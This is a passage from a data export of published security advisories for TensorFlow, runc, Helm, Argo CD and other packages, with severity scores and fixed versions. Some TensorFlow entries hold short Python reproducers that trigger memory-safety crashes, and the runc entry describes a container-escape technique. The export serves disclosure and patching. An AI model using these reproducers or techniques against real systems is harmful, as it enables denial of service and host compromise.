`SdcaOptimizer`,"### Impact +The implementation of `tf.raw_ops.SdcaOptimizer` triggers undefined behavior due to dereferencing a null pointer: + +```python +import tensorflow as tf + +sparse_example_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] +sparse_feature_indices = [tf.constant([], shape=[0, 0, 0, 0], dtype=tf.int64), tf.constant((0), dtype=tf.int64)] +sparse_feature_values = [] + +dense_features = [] +dense_weights = [] + +example_weights = tf.constant((0.0), dtype=tf.float32) +example_labels = tf.constant((0.0), dtype=tf.float32) + +sparse_indices = [tf.constant((0), dtype=tf.int64), tf.constant((0), dtype=tf.int64)] +sparse_weights = [tf.constant((0.0), dtype=tf.float32), tf.constant((0.0), dtype=tf.float32)] + +example_state_data = tf.constant([0.0, 0.0, 0.0, 0.0], shape=[1, 4], dtype=tf.float32) + +tf.raw_ops.SdcaOptimizer( + sparse_example_indices=sparse_example_indices, + sparse_feature_indices=sparse_feature_indices, + sparse_feature_values=sparse_feature_values, dense_features=dense_features, + example_weights=example_weights, example_labels=example_labels, + sparse_indices=sparse_indices, sparse_weights=sparse_weights, + dense_weights=dense_weights, example_state_data=example_state_data, + loss_type=""logistic_loss"", l1=0.0, l2=0.0, num_loss_partitions=1, + num_inner_iterations=1, adaptative=False) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/60a45c8b6192a4699f2e2709a2645a751d435cc3/tensorflow/core/kernels/sdca_internal.cc) does not validate that the user supplied arguments satisfy all [constraints expected by the op](https://www.tensorflow.org/api_docs/python/tf/raw_ops/SdcaOptimizer). + +### Patches +We have patched the issue in GitHub commit [f7cc8755ac6683131fdfa7a8a121f9d7a9dec6fb](https://github.com/tensorflow/tensorflow/commit/f7cc8755ac6683131fdfa7a8a121f9d7a9dec6fb). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-5gqf-456p-4836'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29572'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/f7cc8755ac6683131fdfa7a8a121f9d7a9dec6fb'}]","{'cwe_ids': ['CWE-476'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T18:48:55Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-c3xm-pvg7-gh7r,2021-05-21T19:34:43Z,2021-05-25T18:44:42Z,,['CVE-2021-30465'],mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs,"### Summary + +runc 1.0.0-rc94 and earlier are vulnerable to a symlink exchange attack whereby +an attacker can request a seemingly-innocuous container configuration that +actually results in the host filesystem being bind-mounted into the container +(allowing for a container escape). CVE-2021-30465 has been assigned for this +issue. + +An attacker must have the ability to start containers using some kind of custom +volume configuration, and while recommended container hardening mechanisms such +as LSMs (AppArmor/SELinux) and user namespaces will restrict the amount of +damage an attacker could do, they do not block this attack outright. We have a +reproducer using Kubernetes (and the below description mentions +Kubernetes-specific paths), but this is not a Kubernetes-specific issue. + +The now-released [runc v1.0.0-rc95][release] contains a fix for this issue, we +recommend users update as soon as possible. + +[release]: https://github.com/opencontainers/runc/releases/tag/v1.0.0-rc95 + +### Details + +In circumstances where a container is being started, and runc is mounting +inside a volume shared with another container (which is conducting a +symlink-exchange attack), runc can be tricked into mounting outside of the +container rootfs by swapping the target of a mount with a symlink due to a +time-of-check-to-time-of-use (TOCTTOU) flaw. This is fairly similar in style to +previous TOCTTOU attacks (and is a problem we are working on solving with +libpathrs). + +However, this alone is not useful because this happens inside a mount namespace +with `MS_SLAVE` propagation applied to `/` (meaning that the mount doesn't +appear on the host -- it's only a ""host-side mount"" inside the container's +namespace). To exploit this, you must have additional mount entries in the +configuration that use some subpath of the mounted-over host path as a source +for a subsequent mount. + +However, it turns out with some container orchestrators (such as Kubernetes -- +though it is very likely that other downstream users of runc could have similar +behaviour be accessible to untrusted users), the existence of additional volume +management infrastructure allows this attack to be applied to gain access to +the host filesystem without requiring the attacker to have completely arbitrary +control over container configuration. + +In the case of Kubernetes, this is exploitable by creating a symlink in a +volume to the top-level (well-known) directory where volumes are sourced from +(for instance, +`/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir`), and then +using that symlink as the target of a mount. The source of the mount is an +attacker controlled directory, and thus the source directory from which +subsequent mounts will occur is an attacker-controlled directory. Thus the +attacker can first place a symlink to `/` in their malicious source directory +with the name of a volume, and a subsequent mount in the container will +bind-mount `/` into the container. + +Applying this attack requires the attacker to start containers with a slightly +peculiar volume configuration (though not explicitly malicious-looking such as +bind-mounting `/` into the container explicitly), and be able to run malicious +code in a container that shares volumes with said volume configuration. It +helps the attacker if the host paths used for volume management are well known, +though this is not a hard requirement. + +### Patches +This has been patched in runc 1.0.0-rc95, and users should upgrade as soon as +possible. The patch itself can be found [here](https://github.com/opencontainers/runc/commit/0ca91f44f1664da834bc61115a849b56d22f595f). + +### Workarounds + +There are no known workarounds for this issue. + +However, users who enforce running containers with more confined security +profiles (such as reduced capabilities, not running code as root in the +container, user namespaces, AppArmor/SELinux, and seccomp) will restrict what +an attacker can do in the case of a container breakout -- we recommend users +make use of strict security profiles if possible (most notably user namespaces +-- which can massively restrict the impact a container breakout can have on the +host system). + +### References +* [commit](https://github.com/opencontainers/runc/commit/0ca91f44f1664da834bc61115a849b56d22f595f) +* [seclists public disclosure](https://www.openwall.com/lists/oss-security/2021/05/19/2) + +### Credit + +Thanks to Etienne Champetier for discovering and disclosing this vulnerability, +to Noah Meyerhans for writing the first draft of this patch, and to Samuel Karp +for testing it. + +### For more information + +If you have any questions or comments about this advisory: +* Open an issue in [our issue tracker](https://github.com/opencontainers/runc/issues). +* Email us at .","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/opencontainers/runc'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0-rc95'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.0.0-rc94'}}]","[{'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/security/advisories/GHSA-c3xm-pvg7-gh7r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-30465'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/commit/0ca91f44f1664da834bc61115a849b56d22f595f'}, {'type': 'WEB', 'url': 'https://bugzilla.opensuse.org/show_bug.cgi?id=1185405'}, {'type': 'WEB', 'url': 'https://github.com/opencontainers/runc/releases'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/35ZW6NBZSBH5PWIT7JU4HXOXGFVDCOHH/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4HOARVIT47RULTTFWAU7XBG4WY6TDDHV/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-26'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210708-0003/'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/19/2'}]","{'cwe_ids': ['CWE-22', 'CWE-362', 'CWE-367'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T19:34:43Z', 'nvd_published_at': '2021-05-27T13:15:00Z'}" +1.4.0,GHSA-cwcx-rxgc-cmw3,2021-05-25T20:45:15Z,2021-05-17T20:57:40Z,,['CVE-2021-25943'],Prototype pollution in 101,Prototype pollution vulnerability in '101' versions 1.0.0 through 1.6.3 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '101'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'last_affected': '1.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25943'}, {'type': 'WEB', 'url': 'https://github.com/tjmehta/101/blob/d87f63ce2a4cbdc476e8287abd78327c3144d646/set.js#L52'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25943'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T18:01:38Z', 'nvd_published_at': '2021-05-14T14:15:00Z'}" +1.4.0,GHSA-m54r-vrmv-hw33,2021-11-19T15:28:38Z,2021-05-24T16:57:12Z,,['CVE-2020-15186'],Improper Sanitizing of plugin names in helm,"### Impact + +Security researchers at Trail of Bits discovered that plugin names are not sanitized properly. As a result, a malicious plugin author could use characters in a plugin name that would result in unexpected behavior, such as duplicating the name of another plugin or spoofing the output to `helm --help`. + +### Patches + +This issue has been patched in Helm 3.3.2. + +### Workarounds + +Do not install untrusted Helm plugins. Examine the `name` field in the `plugin.yaml` file for a plugin, looking for characters outside of the [a-zA-Z0-9._-] range.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.3.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.16.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3/pkg/plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.16.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'helm.sh/helm/v3/pkg/plugin'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.3.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/helm/helm/security/advisories/GHSA-m54r-vrmv-hw33'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-15186'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/commit/809e2d999e2c33e20e77f6bff30652d79c287542'}, {'type': 'WEB', 'url': 'https://github.com/helm/helm/commit/c8d6b01d72c9604e43ee70d0d78fadd54c2d8499'}, {'type': 'PACKAGE', 'url': 'https://github.com/helm/helm'}]","{'cwe_ids': ['CWE-20', 'CWE-74'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-24T16:45:43Z', 'nvd_published_at': '2020-09-17T22:15:00Z'}" +1.4.0,GHSA-qq5v-f4c3-395c,2021-05-21T14:15:41Z,2021-05-21T14:31:41Z,,['CVE-2021-23347'],Possible XSS when using SSO with the CLI in github.com/argoproj/argo-cd/v2,"### Impact + +When using SSO with the Argo CD CLI, a malicious SSO provider could have sent specially crafted error message that would result in XSS on the client by means of executing arbitrary JavaScript code. + +We believe the exploitation of this vulnerability is only be possible when Argo CD is connected to a compromised/malicious SSO provider. + +### Patches + +A patch for this vulnerability is available with the v1.8.7 and v1.7.14 releases of Argo CD. + +### Workarounds + +* Do not use SSO with the CLI when you don't trust your SSO provider + + +If you have any questions or comments about this advisory: + +* Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions) +* Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel `#argo-cd` + +### Credits + +The issue was found during static code scanning with CodeQL and fixed by the Argo CD team. While we believed that a rogue SSO provider would pose a severe threat by itself, we fixed it like a regular bug. + +The Argo CD team would like to thank Adam Gold of Snyk (https://snyk.io) for stepping up and classifying this correctly as a security issue and for his help in determining its severity. Also, Snyk kindly reserved and provided the CVE for this vulnerability. + +We fully agree with Adam that this bug is a security vulnerability and justifies publishing a SA, to provide our community and users full transparancy.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.13'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.8.0'}, {'fixed': '1.8.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/security/advisories/GHSA-qq5v-f4c3-395c'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T14:15:41Z', 'nvd_published_at': '2021-03-03T10:15:00Z'}" +1.4.0,GHSA-74qp-233x-p5j8,2023-09-25T11:24:19Z,2021-05-13T22:30:41Z,,['CVE-2021-26544'],Apache Livy Cross-site scripting (XSS) in session names,Livy server version 0.7.0-incubating (only) is vulnerable to a cross site scripting issue in the session name. A malicious user could use this flaw to access logs and results of other users' sessions and run jobs with their privileges. This issue is fixed in Livy 0.7.1-incubating.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.livy:livy-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.7.0-incubating'}, {'fixed': '0.7.1-incubating'}]}], 'versions': ['0.7.0-incubating']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26544'}, {'type': 'WEB', 'url': 'https://github.com/apache/incubator-livy/commit/4d8a912699683b973eee76d4e91447d769a0cb0d'}, {'type': 'WEB', 'url': 'https://github.com/apache/incubator-livy/commit/9f1ba47a2f0d8accc435b133b42c3a76aa9ac846'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2db14e7fd1e5ec2519e8828d43529bad623d75698cc7918af3a3f3ed%40%3Cuser.livy.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/02/20/1'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-01T22:56:37Z', 'nvd_published_at': '2021-02-20T09:15:00Z'}" +1.4.0,GHSA-j8qh-3xrq-c825,2021-05-17T22:31:41Z,2021-05-21T14:28:04Z,,['CVE-2021-29600'],Division by zero in TFLite's implementation of `OneHot`,"### Impact +The implementation of the `OneHot` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/f61c57bd425878be108ec787f4d96390579fb83e/tensorflow/lite/kernels/one_hot.cc#L68-L72): + +```cc +int prefix_dim_size = 1; +for (int i = 0; i < op_context.axis; ++i) { + prefix_dim_size *= op_context.indices->dims->data[i]; +} +const int suffix_dim_size = NumElements(op_context.indices) / prefix_dim_size; +``` + +An attacker can craft a model such that at least one of the dimensions of `indices` would be 0. In turn, the `prefix_dim_size` value would become 0. + +### Patches +We have patched the issue in GitHub commit [3ebedd7e345453d68e279cfc3e4072648e5e12e5](https://github.com/tensorflow/tensorflow/commit/3ebedd7e345453d68e279cfc3e4072648e5e12e5). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-j8qh-3xrq-c825'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29600'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/3ebedd7e345453d68e279cfc3e4072648e5e12e5'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:31:41Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-8p36-q63g-68qh,2022-12-03T03:46:40Z,2021-05-13T22:31:22Z,,['CVE-2021-27582'],Autobinding vulnerability in MITREid Connect,"org/mitre/oauth2/web/OAuthConfirmationController.java in the OpenID Connect server implementation for MITREid Connect through 1.3.3 contains a Mass Assignment (aka Autobinding) vulnerability. This arises due to unsafe usage of the @ModelAttribute annotation during the OAuth authorization flow, in which HTTP request parameters affect an authorizationRequest.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.mitre:openid-connect-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27582'}, {'type': 'WEB', 'url': 'https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server/commit/7eba3c12fed82388f917e8dd9b73e86e3a311e4c'}, {'type': 'PACKAGE', 'url': 'https://github.com/mitreid-connect/OpenID-Connect-Java-Spring-Server'}, {'type': 'WEB', 'url': 'https://portswigger.net/research/hidden-oauth-attack-vectors'}, {'type': 'WEB', 'url': 'http://agrrrdog.blogspot.com/2017/03/autobinding-vulns-and-spring-mvc.html'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T18:32:32Z', 'nvd_published_at': '2021-02-23T18:15:00Z'}" +1.4.0,GHSA-6g88-99wj-8mgg,2021-05-21T18:41:46Z,2021-05-21T19:20:35Z,,['CVE-2020-1960'],Command injection in Apache Flink,"A vulnerability in Apache Flink where, when running a process with an enabled JMXReporter, with a port configured via metrics.reporter.reporter_name>.port, an attacker with local access to the machine and JMX port can execute a man-in-the-middle attack using a specially crafted request to rebind the JMXRMI registry to one under the attacker's control. This compromises any connection established to the process via JMX, allowing extraction of credentials and any other transferred data.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.flink:flink-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.9.3'}]}], 'database_specific': {'last_known_affected_version_range': '< 1.9.2'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.flink:flink-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.10.0'}, {'fixed': '1.10.1'}]}], 'versions': ['1.10.0']}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1960'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r23e559dee1e69741557b5fe431846de1f1a5981356d0ddb9482df88a%40%3Cdev.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r26fcdd4fe288323006253437ebc4dd6fdfadfb5e93465a0e4f68420d@%3Cuser-zh.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r28f17e564950d663e68cc6fe75756012dda62ac623766bb9bc5e7034@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r663cf0d5c386bba2f562d45ad484d786151a84f0b95e45e2b0fb8e50@%3Cissues.flink.apache.org%3E'}]","{'cwe_ids': ['CWE-74'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T18:41:46Z', 'nvd_published_at': '2020-05-14T17:15:00Z'}" +1.4.0,GHSA-xgc3-m89p-vr3x,2021-05-18T22:05:40Z,2021-05-21T14:23:09Z,,['CVE-2021-29540'],Heap buffer overflow in `Conv2DBackpropFilter`,"### Impact +An attacker can cause a heap buffer overflow to occur in `Conv2DBackpropFilter`: + +```python +import tensorflow as tf + +input_tensor = tf.constant([386.078431372549, 386.07843139643234], + shape=[1, 1, 1, 2], dtype=tf.float32) +filter_sizes = tf.constant([1, 1, 1, 1], shape=[4], dtype=tf.int32) +out_backprop = tf.constant([386.078431372549], shape=[1, 1, 1, 1], + dtype=tf.float32) + +tf.raw_ops.Conv2DBackpropFilter( + input=input_tensor, + filter_sizes=filter_sizes, + out_backprop=out_backprop, + strides=[1, 66, 49, 1], + use_cudnn_on_gpu=True, + padding='VALID', + explicit_paddings=[], + data_format='NHWC', + dilations=[1, 1, 1, 1] +) +``` + +Alternatively, passing empty tensors also results in similar behavior: + +```python +import tensorflow as tf + +input_tensor = tf.constant([], shape=[0, 1, 1, 5], dtype=tf.float32) +filter_sizes = tf.constant([3, 8, 1, 1], shape=[4], dtype=tf.int32) +out_backprop = tf.constant([], shape=[0, 1, 1, 1], dtype=tf.float32) + +tf.raw_ops.Conv2DBackpropFilter( + input=input_tensor, + filter_sizes=filter_sizes, + out_backprop=out_backprop, + strides=[1, 66, 49, 1], + use_cudnn_on_gpu=True, + padding='VALID', + explicit_paddings=[], + data_format='NHWC', + dilations=[1, 1, 1, 1] +) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/1b0296c3b8dd9bd948f924aa8cd62f87dbb7c3da/tensorflow/core/kernels/conv_grad_filter_ops.cc#L495-L497) computes the size of the filter tensor but does not validate that it matches the number of elements in `filter_sizes`. Later, when reading/writing to this buffer, code uses the value computed here, instead of the number of elements in the tensor. + +### Patches +We have patched the issue in GitHub commit [c570e2ecfc822941335ad48f6e10df4e21f11c96](https://github.com/tensorflow/tensorflow/commit/c570e2ecfc822941335ad48f6e10df4e21f11c96). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-xgc3-m89p-vr3x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29540'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/c570e2ecfc822941335ad48f6e10df4e21f11c96'}]","{'cwe_ids': ['CWE-120', 'CWE-787'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T22:05:40Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-26gr-cvq3-qxgf,2022-04-01T20:23:53Z,2021-05-07T15:53:18Z,,['CVE-2020-1957'],Improper Authentication in Apache Shiro,"Apache Shiro before 1.5.2, when using Apache Shiro with Spring dynamic controllers, a specially crafted request may cause an authentication bypass.","[{'type': 